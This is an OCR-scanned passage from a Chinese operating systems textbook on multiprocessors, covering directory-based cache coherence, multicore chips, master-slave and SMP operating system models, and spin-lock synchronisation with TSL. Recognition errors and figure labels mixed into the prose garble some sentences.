存储 器 字 来 自 节点 36， 而 不 是 节点 20， 所 以 它 把 请 求 消息 通过 互连网 络 发 送 到 该 高 速 缓存 行 的 的 主 节点 
(поте node) 36 上 ， 询 问 行 4 是 否 被 高 速 缓存 ， 如 果 是 ， 高 速 缓存 在 何 处 。 
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图 8-6 а) 256 个 节点 的 基于 目录 的 多 处 理 机 ，b) 32 位 存储 器 地 址 划分 的 域 ，c) 节点 36 中 的 目录 


当 请 求 通过 互连网 络 到 达 节 点 36 时 ， 它 被 路 由 至 目录 硬件 。 硬 件 检索 其 包含 2* 个 表 项 的 目录 表 (其 
中 的 每 个 表 项 代表 一 个 高 速 缓存 行 ) 并 解析 到 项 4。 从 图 8-6c 中 ， 我 们 可 以 看 到 该 行 没 有 被 高 速 缓存 ， 所 
以 硬件 从 本 地 RAM 中 取出 第 4 行 ， 送 回 给 节点 20， 更 新 目录 项 4， 指 出 该 行 目前 被 高 速 缓存 在 节点 20 处 。 

现在 来 考虑 第 二 个 请 求 ， 这 次 访问 节点 36 的 第 2 行 。 在 图 8-6c 中 ， 我 们 可 以 看 到 这 一 行 在 节点 82 处 
被 高 速 缓存 。 此 刻 硬件 可 以 更 新 目录 项 2， 指 出 该 行 现在 在 节点 20 上 ， 然后 送 一 条 消息 给 节点 82， 指 示 
把 该 行 传 给 节点 20 并 且 使 其 自身 的 高 速 缓 存 无 效 。 注意， 即使 一 个 所 谓 “ 共 享 存储 器 多 处 理 机 ”， 在 下 
层 仍 然 有 大 量 的 消息 传递 。 

让 我 们 顺便 计算 一 下 有 多 少 存储 器 单元 被 目录 占用 。 每 个 节点 有 16 MB 的 RAM， 并 且 有 2" 个 9 位 的 
目录 项 记录 该 RAM。 这 样 目录 上 的 开支 大 约 是 9 x 2 位 除 以 16 MB， 即 约 1.76%， 一 般 而 言 这 是 可 接受 
的 〈 尽 管 这 些 都 是 高 速 存储 器 ， 会 增加 成 本 )。 即 使 对 于 32 字 节 的 高 速 缓存 行 ， 开 销 也 只 有 4% 。 至 于 
128 字 节 的 高 速 缓存 行 ， 它 的 开销 不 到 1% 。 

该 设计 有 一 个 明显 的 限制 ， 即 一 行 只 能 被 一 个 节点 高 速 缓存 。 要 想 允 许 一 行 能 够 在 多 个 节点 上 被 高 
速 缓存 ， 我 们 需要 某 种 对 所 有 行 定位 的 方法 ， 例 如 ， 在 写 操作 时 使 其 无 效 或 更 新 。 要 允许 同时 在 若干 节 
点 上 进行 高 速 缓存 ， 有 几 种 选择 方案 ， 不 过 对 它们 的 讨论 已 超出 了 本 书 的 范围 。 

5. 55А 

随 着 芯片 制造 技术 的 发 展 ， 晶 体 管 的 体积 越 来 越 小 ， 从 而 有 可 能 将 越 来 越 多 的 晶体 管 放 入 一 个 芯片 
中 。 这 个 基于 经 验 的 发 现 通常 称 为 摩尔 定律 (Moore's Law), 得 名 于 首次 发 现 该 规律 的 Intel 公 司 创始 人 
之 一 Gordon Moore, Intel Core 2 Duo 系 列 芯片 已 包含 了 3 亿 数 量 级 的 晶体 管 。 

随 之 一 个 显而易见 的 问题 是 :“ 你 怎么 利用 这 些 晶 体 管 ? ”按照 我 们 在 第 1.3.1 小 节 的 讨论 ， 一 个 选 
拓 是 给 芯片 添加 数 兆 字 节 的 高 速 缓 在 。 这 个 选择 是 认真 的 ， 带 有 4 兆 字 节 片上 高 速 缓存 的 芯片 现在 已 经 
很 常见 ， 并 且 带 有 更 多 片上 高 速 缓存 的 芯片 也 即将 出 现 。 但 是 到 了 某 种 程度 ， 再 增加 高 速 缓存 的 大 小 只 
能 将 命中 率 从 99% 提 高 到 99.5% ， 而 这 样 的 改进 并 不 能 显著 提升 应 用 的 性 能 。 

另 一 个 选择 是 将 两 个 或 者 多 个 完整 的 CPU， 通 常 称 为 核 (core) ， 放 到 同一 个 芯片 上 (技术 上 来 说 是 同一 
个 小 竺 片 )。 双 核 和 四 核 的 芯片 已 经 普及 ， 八 十 核 的 芯片 已 经 被 制造 出 来 ， 而 带 有 上 百 个 核 的 芯片 也 即将 出 现 。 

虽然 CPU 可 能 共享 高 速 缓存 或 者 不 共享 (如 图 1-8 所 示 ) ， 但 是 它们 都 共享 内 存 。 考 虑 到 每 个 内 存 字 
总 是 有 惟一 的 值 ， 这 些 内 存 是 一 致 的 。 特殊 的 硬件 电路 可 以 确保 在 一 个 字 同 时 出 现在 两 个 或 者 多 个 的 高 
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速 缓存 中 的 情况 下 ， 当 其 中 某 个 CPU 修改 了 该 字 ， 所 有 其 他 高 速 缓存 中 的 该 字 都 会 被 自动 地 并 且 原子 性 
地 删除 来 确保 一 致 性 。 这 个 过 程 称 为 状 探 (snooping), 

这 样 设计 的 结果 是 多 核 芯片 就 相当 于 小 的 多 处 理 机 。 实 际 上 ， 多 核 芯片 时 常 被 称 为 片 级 多 处 理 机 
(Chip-level MultiProcessors，CMP)。 从 软件 的 角度 来 看 ，CMP 与 基于 总 线 的 多 处 理 机 和 使 用 交换 网 络 
的 多 处 理 机 并 没有 太 大 的 差别 。 不 过 ， 它 们 还 是 存在 着 若干 的 差别 。 例 如 ， 对 基于 总 线 的 多 处 理 机， 每 
个 CPU 拥有 自己 的 高 速 缓存 ， 如 图 8-2b 以 及 图 1-8b 的 AMD 设 计 所 示 。 在 图 1-8a 所 示 的 Intel 使 用 的 共享 高 
速 缓存 的 设计 并 没有 出 现在 其 他 的 多 处 理 机 中 。 共 享 二 级 高 速 缓存 会 影响 性 能 。 如 果 -个 核 需要 很 多 高 
速 缓存 空间 ， 而 另 一 个 核 不 需要 ， 这 样 的 设计 克 许 它们 各 自 使 用 所 需 的 高 速 缓存 。 但 另 一 方面 ， 共 享 高 
速 缓存 也 让 一 个 仿 轩 的 核 损害 其 他 核 的 性 能 成 为 了 可 能 。 

CMP 与 其 他 更 大 的 多 处 理 机 之 间 的 另 一 个 差异 是 容错 。 因 为 CPU 之 间 的 连接 非常 紧密 ， 一 个 共享 模 
块 的 失效 可 能 导致 许多 CPU 同时 出 错 。 而 这 样 的 情况 在 传统 的 多 处 理 机 中 是 很 少 出 现 的 。 

除了 所 有 核 都 是 对 等 的 对 称 多 核 芯片 之 外 ， 还 有 一 类 多 核 芯片 被 称 为 片上 系统 (system on a chip), 
这 些 芯 片 含有 一 个 或 者 多 个 主 CPU,， 但 是 同时 还 包含 若干 个 专用 核 ， 例如 视频 与 音频 解码 器 、 加 密 芯片 、 
网 络 接口 等 。 这 些 核 共同 构成 了 完整 的 片上 计算 机 系统 。 

正如 过 去 已 经 发 生 的 ， 硬 件 的 发 展 常常 领先 于 软件 。 多 核 的 时 代 已 经 来 临 ， 但 是 我 们 还 不 具备 为 它 
们 编写 应 用 程序 的 能 力 。 现 有 的 编程 语言 并 不 适合 编写 高 度 并 行 的 代码 ， 同时 适用 的 编译 器 和 调试 工具 还 
很 匮乏 。 几 乎 没有 几 个 程序 员 有 编写 并 行程 序 的 经 验 ， 而 大 部 分 程序 员 对 于 如 何 将 工作 划分 为 若干 可 以 并 
行 执行 的 块 (package) 知之 其 少 。 同 步 、 消 除 竞 争 、 避 免 死 锁 成 为 了 程序 员 的 显 梦 ， 同时 也 影响 到 了 性 
能 。 信 号 量 (semaphore) 并 不 能 解决 问题 。 除 了 这 些 问 题 ， 什么 样 的 应 用 真 的 需要 使 用 数 百 个 核 尚 不 明 
确 。 自 然 语言 语音 识别 可 能 需要 大 量 的 计算 能 力 ， 但 这 里 的 问题 并 不 是 缺少 时 钟 周期 ， 而 是 缺少 可 行 的 算 
法 。 简 而 言 之 ， 或 许 硬件 开发 人 员 正在 发 布 软件 开发 人 员 不 知道 如 何 使 用 而 用 户 也 并 不 需要 的 产品 。 


8.1.2 多 处 理 机 操作 系统 类 型 

让 我 们 从 对 多 处 理 机 硬件 的 讨论 转 到 多 处 理 机 软件 ， 特 别 是 多 处 理 机 操作 系统 上 来 。 这 里 有 各 种 可 
能 的 方法 。 接 下 来 将 讨论 其 中 的 三 种 。 需要 强调 的 是 所 有 这 些 方法 除了 适用 于 多 核 系统 之 外 ， 同 样 适用 
于 包含 多 个 分 离 CPU 的 系统 。 

1. 每 个 CPU 有 自己 的 操作 系统 

组 织 一 个 多 处 理 机 操作 系统 的 可 能 的 最 简单 的 方法 是 ， 静态 地 把 存储 器 划分 成 和 CPU 一 样 多 的 各 个 
部 分 ， 为 每 个 CPU 提供 其 私有 存储 器 以 及 操作 系统 的 各 自私 有 副本 。 实际 上 ”个 CPU 以 m 个 独立 计算 机 的 
形式 运行 。 这 样 做 一 个 明显 的 优点 是 ， 允 许 所 有 的 CPU 共享 操作 系统 的 代码 ， 而 且 只 需要 提供 数据 的 私 
有 副本 ， 如 图 8-7 所 示 。 


СРО 1 CPU2 CPU 3 CPU 4 
有 OS 的 有 OS 的 有 OS 的 有 OS 的 
私有 私有 私有 私有 
副本 副本 副本 副本 

N 总 线 


图 8-7 在 4 个 CPU 中 划分 多 处 理 机 存储 器 ， 但 共享 一 个 操作 系统 代码 的 副本 。 
标 有 “数据 ”字样 的 方 框 是 每 个 CPU 的 操作 系统 私有 数据 
这 一 机 制 比 有 n 个 分 离 的 计算 机 要 好 ， 因为 它 允 许 所 有 的 机 器 共享 一 套 磁 盘 及 其 他 的 1/O 设 备 ， 它 还 多 
许 灵活 地 共享 存储 器 。 例 如 ， 即 便 使 用 静态 内 存 分 配 ， 一 个 CPU 也 可 以 获得 极 大 的 一 块 内 存 ， 从 而 高 效 地 
执行 代码 。 另 外 ， 由 于 生产 者 能 够 直接 把 数据 写 入 存储器， 从 而 使 得 消费 者 从 生产 者 写 人 的 位 置 取出 数据 ， 
因此 进程 之 间 可 以 高 效 地 通信 。 况 且 ， 从 操作 系统 的 角度 看 ， 每 个 CPU 都 有 自 己 的 操作 系统 非常 自然 。 
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值得 提 及 该 设计 看 来 不 明显 的 四 个 方面 。 首 先 ， 在 一 个 进程 进行 系统 调用 时 ， 该 系统 调用 是 在 本 机 
的 CPU 上 被 捕获 并 处 理 的 ， 并 使 用 操作 系统 表 中 的 数据 结构 。 

其 次 ， 因 为 每 个 操作 系统 都 有 自己 的 表 ， 那 么 它 也 有 自己 的 进程 集合 ， 通 过 自身 调度 这 些 进程 。 这 
里 没有 进程 共享 。 如 果 一 个 用 户 登录 到 CPU 1， 那 么 他 的 所 有 进程 都 在 CPU 1 上 运行 。 因 此 ， 在 CPU 2 有 
负载 运行 而 CPU 1 空 载 的 情形 是 会 发 生 的 。 

第 三 ， 没 有 页 面 共享 。 会 出 现 如 下 的 情形 : 在 CPU2 不 断 地 进行 页 面 调度 时 CPU 1 却 有 多 余 的 页 面 。 
由 于 内 存 分 配 是 固定 的 ， 所 以 CPU 2 无 法 向 CPU 1 借用 页 面 。 

第 四 ， 也 是 节 坏 的 情形 ， 如 果 操作 系统 维护 近期 使 用 过 的 磁盘 块 的 缓冲 区 高 速 缓存 ， 每 个 操作 系统 
都 独自 进行 这 种 维护 工作 , 因此， 可 能 出 现 某 一 修改 过 的 磁盘 块 同时 存在 于 多 个 缓冲 区 高 速 缓存 的 情况 ， 
这 将 会 导致 不 一 致 性 的 结果 。 避 免 这 一 问题 的 惟一 途径 是 ， 取 消 缓冲 区 高 速 缓 在。 这样 做 并 不 难 ， 但 是 
会 显著 降低 性 能 。 

由 于 这 些 原因 ， 上 述 模型 已 很 少 使 用 ， 尽 管 在 早期 的 多 处 理 机 中 它 一 度 被 采用 ， 那 时 的 目标 是 把 已 
有 的 操作 系统 尽 可 能 快 地 移植 到 新 的 多 处 理 机 上 。 

2. 主 从 多 处 理 机 

图 8-8 中 给 出 的 是 第 二 种 模型 。 在 这 种 模型 中 ， 操 作 系 统 的 一 个 副本 及 其 数据 表 都 在 CPU 1 上 ， 而 不 
是 在 其 他 所 有 CPU 上 。 为 了 在 该 CPU 1 上 进行 处 理 ， 所 有 的 系统 调用 都 重 定向 到 CPU 1 上 。 如 果 有 剩余 
的 CPU 时 间 ， 还 可 以 在 CPU 1 上 运行 用 户 进程 。 这 种 模型 称 为 主 从 模型 (master-slave) ， 因 为 CPU 1 是 
主 CPU， 而 其 他 的 都 是 从 属 CPU 。 


CPU1 CPU2 CPU 3 CPU4 存储 器 vo 


从 机 
运行 用 户 
进程 


图 8-8 主 从 多 处 理 机 模型 


主 从 模型 解决 了 在 第 一 种 模型 中 的 多 数 问题 。 有 单一 的 数据 结构 (如 一 个 链表 或 者 一 组 优先 级 链表 ) 
用 来 记录 就 结 进程 。 当 某 个 CPU 空闲 下 来 时 ， 它 向 CPU 1 上 的 操作 系统 请 求 一 个 进程 运行 ， 并 被 分 配 一 
个 进程 。 这 样 ， 就 不 会 出 现 一 个 CPU 空闲 而 另 一 个 过 载 的 情形 。 类 似 地 ， 可 在 所 有 的 进程 中 动态 地 分 配 
页 面 ， 而 且 只 有 一 个 缓冲 区 高 速 缓存 ， 所 以 决 不 会 出 现 不 一 致 的 情形 。 

这 个 模型 的 问题 是 ， 如 果 有 很 多 的 CPU， 主 CPU 会 变 成 一 个 瓶颈 。 毕 竟 ， 它 要 处 理 来 自 所 有 CPU 的 
系统 调用 。 如 果 全 部 时 间 的 10% 用 来 处 理 系统 调用 ， 那 么 10 个 CPU 就 会 使 主 CPU 饱 和 ， 而 20 个 CPU 就 会 使 
主 CPU 彻底 过 载 。 可 见 ， 这 个 模型 虽然 简单 ， 而 且 对 小 型 多 处 理 机 是 可 行 的 ， 但 不 能 用 于 大 型 多 处 理 机 。 

3. 对 称 多 处 理 机 

我 们 的 第 三 种 模型 ， 即 对 称 多 处 理 机 (Symmetric MultiProcessor，SMP)， 消 除了 上 述 的 不 对 称 性 。 
在 存储 器 中 有 操作 系统 的 一 个 副本 ， 但 任何 CPU 都 可 以 运行 它 。 在 有 系统 调用 时 ， 进 行 系统 调用 的 CPU 
陷入 内 核 并 处 理 系统 调用 。 图 8-9 是 对 SMP 模 式 的 说 明 。 

这 个 模型 动态 地 平衡 进程 和 存储 器 ， 因 为 它 只 有 一 套 操作 系统 数据 表 。 它 还 消除 了 主 CPU 的 瓶颈 ， 
因为 不 存在 主 CPU， 但 是 这 个 模型 也 带 来 了 自身 的 问题 。 特 别 是 ， 当 两 个 或 更 多 的 CPU 同时 运行 操作 系 
统 代码 时 ， 就 会 出 现 灾难 。 想 象 有 两 个 CPU 同时 选择 相同 的 进程 运行 或 请 求 同 一 个 空闲 存储 器 页 面 。 处 
理 这 些 问题 的 最 简单 方法 是 在 操作 系统 中 使 用 互 斥 信号 量 ( 锁 ) ， 使 整个 系统 成 为 一 个 大 临界 区 。 当 一 
个 CPU 要 运行 操作 系统 时 ， 它 必须 首先 获得 互 斥 信号 量 。 如 果 互 斥 信号 量 被 锁 住 ， 就 得 等 待 。 按照 这 种 
方式 ， 任 何 CPU 都 可 以 运行 操作 系统 ， 但 在 任 一 时 刻 只 有 一 个 CPU 可 运行 操作 系统 。 
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CPU 1 CPU2 CPU 3 CPU4 存储 器 Шә] 


运 运行 用 户 运行 用 户 
程 和 进程 和 进程 和 
共 Е 共享 操作 共享 操作 
系统 系统 系统 


总 线 
图 8-9 SMP 多 处 理 机 模型 


这 个 模型 是 可 以 工作 的 ， 但 是 它 几 乎 同 主 从 模式 一 样 精 粒 。 同 样 假设 ， 如 果 所 有 时 间 的 10% 花 费 在 
操作 系统 内 部 。 那 么 在 有 20 个 CPU 时 ， 会 出 现 等 待 进入 的 CPU 长 队 。 幸 运 的 是 ， 比较 容易 进行 改进 。 操 
作 系 统 中 的 很 多 部 分 是 彼此 独立 的 。 例 如 个 CPU 运行 调度 程序 时 ， 另 一 个 CPU 则 处 理 文件 系统 的 
调用 ， 而 第 三 个 在 处 理 一 个 缺 页 异常 ,> 方式 是 没有 问题 的 。 

这 一 事实 使 得 把 操作 系统 分 割 成 互 不 影响 的 临界 区 。 每 个 临界 区 由 其 互 斥 信号 量 保护 ， 所 以 一 次 只 
有 一 个 CPU 可 执行 它 。 采 用 这 种 方式 ， 可 以 实现 更 多 的 并 行 操作 。 而 某 些 表格 ， 如 进程 表 ， 可 能 恰巧 被 
多 个 临界 区 使 用 。 例 如 ， 在 调度 时 需要 进程 表 ， 在 系统 fork 调 用 和 信号 处 理 时 也 都 需要 进程 表 。 多 临界 
区 使 用 的 每 个 表格 ， 都 需要 有 各 自 的 互 斥 信号 量 。 通 过 这 种 方式 ， 可 以 做 到 每 个 临界 区 在 任 一 个 时 刻 只 
被 一 个 CPU 执行 ， 而 且 在 任 一 个 时 刻 每 个 临界 表 (critical table) 也 只 被 一 个 CPU 访问 。 

大 多 数 的 现代 多 处 理 机 都 采用 这 种 安排 。 为 这 类 机 器 编写 操作 系统 的 困难 ， 不 在 于 其 实际 的 代码 与 
普通 的 操作 系统 有 多 大 的 不 同 ， 而 在 于 如 何 将 其 划分 为 可 以 由 不 同 的 CPU 并 行 执行 的 临界 区 而 互 不 干扰 ， 
即使 以 细小 的 、 间 接 的 方式 。 另 外 ， 对 于 被 两 个 或 多 个 临界 区 使 用 的 表 必须 通过 互 斥 信号 量 分 别 加 以 保 
护 ， 而 且 使 用 这 些 表 的 代码 必须 正确 地 运用 互 斥 信号 量 。 

更 进一步 ， 必 须 格外 小 心地 避免 死 锁 。 如 果 两 个 临界 区 都 需要 表 A 和 表 B ， 其 中 一 个 首先 申请 A， 另 
一 个 首先 申请 B， 那 么 迟早 会 发 生死 锁 ， 而 且 没有 人 知道 为 什么 会 发 生死 锁 。 理论 上 ， 所 有 的 表 可 以 被 
赋予 整数 值 ， 而 且 所 有 的 临界 区 都 应 该 以 升序 的 方式 获得 表 。 这 一 策略 避免 了 死 锁 ， 但 是 需要 程序 员 非 
常 仔细 地 考虑 每 个 临界 区 需要 哪个 表 ， 以 便 按照 正确 的 次 序 安排 请 求 。 

由 于 代码 是 随 着 时 间 演化 的 ， 所 以 也 许 有 个 临界 区 需要 一 张 过 去 不 需要 的 新 表 。 如 果 程 序 员 是 新 接 
手工 作 的 ， 他 不 了 解 系统 的 整个 逻辑 ， 那 么 可 能 只 是 在 他 需要 的 时 候 获 得 表 ， 并 且 在 不 需要 时 释放 掉 。 
尽管 这 看 起 来 是 合理 的 ， 但 是 可 能 会 导致 死 锁 ， 即 用 户 会 觉察 到 系统 被 凝固 住 了 。 要 做 正确 并 不 容易 ， 
而 且 要 在 程序 员 不 断 更 换 的 数 年 时 间 之 内 始终 保持 正确 性 太 困难 了 。 


8.1.3 多 处 理 机 同步 

在 多 处 理 机 中 CPU 经 常 需要 同步 。 这 里 刚刚 看 到 了 内 核 临界 区 和 表 被 互 斥 信号 量 保护 的 情形 。 现 在 
让 我 们 仔细 看 看 在 多 处 理 机 中 这 种 同步 是 如 何 工作 的 。 正 如 我 们 将 看 到 的 ， 它 远 不 是 那么 无 足 轻重 。 

开始 讨论 之 前 ， 还 需要 引入 同步 原 语 。 如 果 一 个 进程 在 单 处 理 机 ( 仅 含 一 个 CPU) 中 需要 访问 一 些 
内 核 临界 表 的 系统 调用 ， 那 么 内 核 代码 在 接触 该 表 之 前 可 以 先 禁止 中 断 。 然后 它 继续 工作 ， 在 相关 工作 
完成 之 前 ， 不 会 有 任何 其 他 的 进程 渔 进来 访问 该 表 。 在 多 处 理 机 中 ， 禁止 中 断 的 操作 只 影响 到 完成 禁止 
中 上 断 操作 的 这 个 CPU， 其 他 的 CPU 继 续 运行 并 且 可 以 访问 临界 表 。 因 此 ， 必须 采用 一 种 合适 的 互 斥 信号 
量 协议 ,而 且 所 有 的 CPU 都 遵守 该 协议 以 保证 互 斥 工作 的 进行 。 

任何 实用 的 互 斥 信号 量 协议 的 核心 都 是 一 条 特殊 指令 ， 该 指令 允许 检测 一 个 存储 器 字 并 以 一 种 不 可 
见 的 操作 设置 。 我 们 来 看 看 在 图 2-22 中 使 用 的 指令 TSL (Test and Set Lock) 是 如 何 实现 临界 区 的 。 正 如 
我 们 先前 讨论 的 ， 这 条 指令 做 的 是 ， 读 出 一 个 存储 器 字 并 把 它 存 储 在 一 个 寄存 器 中 。 同 时 ， 它 对 该 存储 
器 字 写 人 一 个 1 (或 某 些 非 零 值 )。 当 然 ， 这 需要 两 个 总 线 周期 来 完成 存储 器 的 读 写 。 在 单 处 理 机 中 ， 只 
要 该 指令 不 被 中 途中 断 ，TSL 指 令 就 始终 照常 工作 。 
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现在 考虑 在 一 个 多 处 理 机 中 发 生 的 情况 。 在 图 8-10 中 我 们 看 到 了 最 坏 情 况 的 时 序 , 其 中 存储 器 字 1000， 
被 用 作 一 个 初始 化 为 0 的 锁 。 第 1 步 ， 
CPU 1 读 出 该 字 得 到 一 个 0。 第 2 步 ， 
在 CPU 1 有 机 会 把 该 字 写 为 1 之 前 ， 
CPU 2 进入 ， 并 且 也 读 出 该 字 为 0。 第 


CPU1 1000Ж 存储 器 CPU2 
初始 化 为 0 


3 步 ，CPU 1 把 1! 写 入 该 字 。 第 4 步 ， 

CPU 2 也 把 1 写 入 该 字 。 两 个 CPU 都 由 ы 
TSL 指 令 得 到 0， 所 以 两 者 都 对 临界 3CPU1 一 个 | a OPU? 5 11 ай 
进行 访问 ， 并 且 互 斥 失 败 。 

Te TSL 图 8-10 如 果 不 能 锁 住 总 线 ，TSL 指 令 会 失效 。 这 里 

指令 必须 首先 锁 住 总 线 ， 阻 止 其 他 的 的 四 步 解释 了 失效 情况 


CPU 访问 它 ， 然 后 进行 存储 器 的 读 写 访问 ， 再 解锁 总 线 。 对 总 线 加 锁 的 典型 做 法 是 ， 先 使 用 通常 的 总 线 协 
议 请 求 总 线 ， 并 申明 (设置 一 个 逻辑 1) 已 拥有 某 些 特定 的 总 线 线路 ， 直 到 两 个 周期 全 部 完成 。 只 要 始终 
保持 拥有 这 一 特定 的 总 线 线路 ， 那 么 其 他 CPU 就 不 会 得 到 总 线 的 访问 权 。 这 个 指令 只 有 在 拥有 必要 的 线路 
和 和 使 用 它们 的 〈 硬 件 ) 协议 上 才能 实现 。 现 代 总 线 有 这 些 功能 ， 但 是 早期 的 一 些 总 线 不 具备 ， 它 们 不 能 
正确 地 实现 TSL 指 令 。 这 就 是 Peterson 协议 〈 完 全 用 软件 实现 同步 ) 会 产生 的 原因 (Peterson, 1981), 

如 果 正 确 地 实现 和 使 用 TSL， 它 能 够 保证 互 斥 机 制 正常 工作 。 但 是 这 种 互 斥 方 法 使 用 了 自 旋 锁 
(spin lock) ， 因 为 请 求 的 CPU 只 是 在 原 地 尽 可 能 快 地 对 锁 进行 循环 测试 。 这 样 做 不 仅 完全 浪费 了 提出 请 
求 的 各 个 CPU 的 时 间 ， 而 且 还 给 总 线 或 存储 器 增加 了 大 量 的 负载 ， 严 重地 降低 了 所 有 其 他 CPU 从 事 正 常 
工作 的 速度 。 

乍 一 看 ， 高 速 缓存 的 实现 也 许 能 够 消除 总 线 竞争 的 问题 ， 但 事实 并 非 如 此 。 理 论 上 ， 只 要 提出 请 求 
的 CPU 已 经 读 取 了 锁 字 (lock word) ， 它 就 可 在 其 高 速 缓存 中 得 到 一 个 副本 。 只 要 没有 其 他 CPU 试图 使 
用 该 锁 ， 提 出 请 求 的 CPU 就 能 够 用 完 其 高 速 缓存 。 当 拥有 锁 的 CPU 写 人 一 个 1 到 高 速 缓存 并 释放 它 时 ， 
高 速 缓存 协议 会 自动 地 将 它 在 远程 高 速 缓存 中 的 所 有 副本 失效 ， 要 求 再 次 读 取 正 确 的 值 。 

问题 是 ,高 速 缓存 操作 是 在 32 或 64 字 节 的 块 中 进行 的 。 通 常 ， 拥有 锁 的 CPU 也 需要 这 个 锁 字 。 
由 于 TSL 指 令 是 一 个 写 指令 (因为 它 修改 了 锁 ) ， 所 以 它 需要 互 斥 地 访问 含有 锁 的 高 速 缓存 块 。 这 样 ， 
每 一 个 TSL 都 使 锁 持 有 者 的 高 速 缓存 中 的 块 失效 ， 并 且 为 请 求 的 CPU 取 一 个 私有 的 、 惟 一 的 副本 。 只 要 
锁 拥 有 者 访问 到 该 锁 的 邻接 字 ， 该 高 速 缓存 块 就 被 送 进 其 机 器 。 这 样 一 来 ， 整 个 包含 锁 的 高 速 缓存 块 就 
会 不 断 地 在 锁 的 拥有 者 和 锁 的 请 求 者 之 间 来 回 穿梭 ， 导 致 了 比 单个 读 取 一 个 锁 字 更 大 的 总 线 流量 。 

如 果 能 消除 在 请 求 一 侧 的 所 有 由 TSL 引 起 的 写 操作 ， 我 们 就 可 以 明显 地 减少 这 种 开销 。 使 提出 请 求 
的 CPU 首先 进行 一 个 纯 读 操作 来 观察 锁 是 否 空闲， 就 可 以 实现 这 个 目标 。 只 有 在 锁 看 来 是 空 立时 ，TSL 
才 真正 去 获取 它 。 这 种 小 小 变化 的 结果 是 ， 大 多 数 的 行为 变 成 读 而 不 是 写 。 如 果 拥 有 锁 的 CPU 只 是 在 同 
一 个 高 速 缓存 块 中 读 取 各 种 变量 ， 那 么 它们 每 个 都 可 以 以 共享 只 读 方 式 拥有 一 个 高 速 缓存 块 的 副本 ， 这 
就 消除 了 所 有 的 高 速 缓存 块 传送 。 当 锁 最 终 被 释放 时 ， 锁 的 所 有 者 进行 写 操作 ， 这 需要 排 它 访问 ， 也 就 
使 远程 高 速 缓存 中 的 所 有 其 他 副本 失效 。 在 提出 请 求 的 CPU 的 下 一 个 读 请 求 中 ， 高 速 缓存 块 会 被 重新 装 
载 。 注 意 ， 如 果 两 个 或 更 多 的 CPU 竞争 同一 个 锁 ， 那 么 有 可 能 出 现 这 样 的 情况 ， 两 者 同时 看 到 锁 是 空闲 
的 ， 于 是 同时 用 TSL 指 令 去 获得 它 。 只 有 其 中 的 一 个 会 成 功 ， 所 以 这 里 没有 竞争 条 件 ， 因 为 真正 的 获取 
是 由 TSL 指 令 进行 的 ， 而 且 这 条 指令 是 原子 性 的 。 即 使 看 到 了 锁 空 闻 ， 然 后 立即 用 TSL 指 令 试 图 获得 它 ， 
也 不 能 保证 真正 得 到 它 。 其 他 CPU 可 能 会 取胜 ， 不 过 对 于 该 算法 的 正确 性 来 说 ， 谁 得 到 了 锁 并 不 重要 。 
纯 读 出 操作 的 成 功 只 是 意味 着 这 可 能 是 一 个 获得 锁 的 好 时 机 ， 但 并 不 能 确保 能 成 功 地 得 到 锁 。 

另 一 个 减少 总 线 流量 的 方式 是 使 用 著名 的 以 太 网 二 进 制 指数 补偿 算法 (binary exponential backoff 
algorithm) (Anderson，1990)。 不 是 采用 连续 轮 询 ， 参 考 图 2-22， 而 是 把 一 个 延迟 循环 插入 轮 询 之 间 。 
初始 的 延迟 是 一 条 指令 。 如 果 锁 仍然 忙 ， 延 迟 被 加 倍 成 为 两 条 指令 ， 然 后 ， 四 条 指令 ， 如 此 这 样 进行 、 
直到 某 个 最 大 值 。 当 镇 释 放 时 ， 较 低 的 最 大 值 会 产生 快速 的 响应 。 但 是 会 浪费 较 多 的 总 线 周期 在 高 速 组 
存 的 颠 签 上。 而 较 高 的 最 大 值 可 减少 高 速 缓存 的 颠 繁 , 但 是 其 代价 是 不 会 注意 到 锁 如 此 迅速 地 成 为 空 亲 。 
二 进 制 指数 补偿 算法 无 论 在 有 或 无 TSL 指 令 前 的 纯 读 的 情况 下 都 适用 。 
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一 个 更 好 的 思想 是 ， 让 每 个 打算 获得 互 斥 信和 号 量 的 CPU 都 拥有 各 自用 于 测试 的 私有 锁 变 量 ， 如 图 
8-11 所 示 (Mellor-Crummey 和 Scott, сриз—=| з CPU 3 在 这 个 (私有) 
1991)。 有 关 的 变量 应 该 存放 在 未 使 用 的 КЕН 锁 上 轮转 
高 速 缓存 块 中 以 避免 冲突 。 对 这 种 算法 的 这 | | 
摘 述 如 下 ， 给 一 个 未 能 获得 镇 的 CPU 分 配 22886 Д 
一 个 锁 变量 并 且 把 它 附 在 等 待 该 锁 的 CPU 
链表 的 未 端 。 在 当前 锁 的 持 有 者 退出 临 愉 
区 时 ， 它 释放 链表 中 的 首 个 CPU 正在 测试 
的 私有 锁 (在 自己 的 高 速 缓存 中 ) 。 然 后 ”共享 存储 器 一 全 
该 CPU 进入 临界 区 。 操 作 完 成 之 后 ， 该 CPU 1 持 有 实际 锁 时 也 释放 CPU 2 正在 其 
CPU 释放 锁 。 其 后 继 者 接着 使 用 ， 以 此 类 上 轮转 的 私有 锁 
推 。 尽 管 这 个 协议 有 些 复杂 (为 了 避免 两 


个 CPU 同 时 把 它们 自己 加 在 链表 的 末端 )， 图 8-11 使 用 多 个 锁 以 防止 高 速 缓存 直入 
但 它 能 够 有 效 工作 ， 而 且 消除 了 饥饿 问题 。 具 体 细节 ， 读 者 可 以 参考 有 关 论文 
авы 


到 目前 为 止 ， 不 论 是 连续 轮 询 方式 、 间 鞭 轮 询 方式 ， 还 是 把 自己 附 在 进行 等 候 CPU 链表 中 的 方式 ， 
我 们 都 假定 需要 加 锁 的 互 斥 信号 量 的 CPU 只 是 保持 等 待 。 有 时 对 于 提出 请 求 的 CPU 而 言 ， 只 有 等 待 ， 不 
存在 其 他 替代 的 办 法 。 例 如 ， 假 设 一 些 CPU 是 空闲 的 ， 需要 访问 共享 的 就 绪 链表 (ready list) 以 便 选 择 
一 个 进程 运行 。 如 果 就 绪 链表 被 锁 住 了 ， 那么 CPU 就 不 能 够 只 是 决定 暂停 其 正在 进行 的 工作 ， 而 去 运行 
另 一 个 进程 ， 因 为 这 样 做 需要 访问 就 绪 链表 。 CPU 必须 保持 等 待 直到 能 够 访问 该 就 绪 链表 。 

然而 ， 在 另外 一 些 情形 中 ， 却 存在 着 别 的 选择 。 例 如 ， 如 果 在 一 个 CPU 中 的 某 些 线程 需要 访问 文件 系 
统 缓冲 区 高 速 缓存 ， 而 该 文件 系统 缓冲 区 高 速 缓存 正好 锁 住 了 ， 那么 CPU 可 以 决定 切换 至 另外 一 个 线程 而 
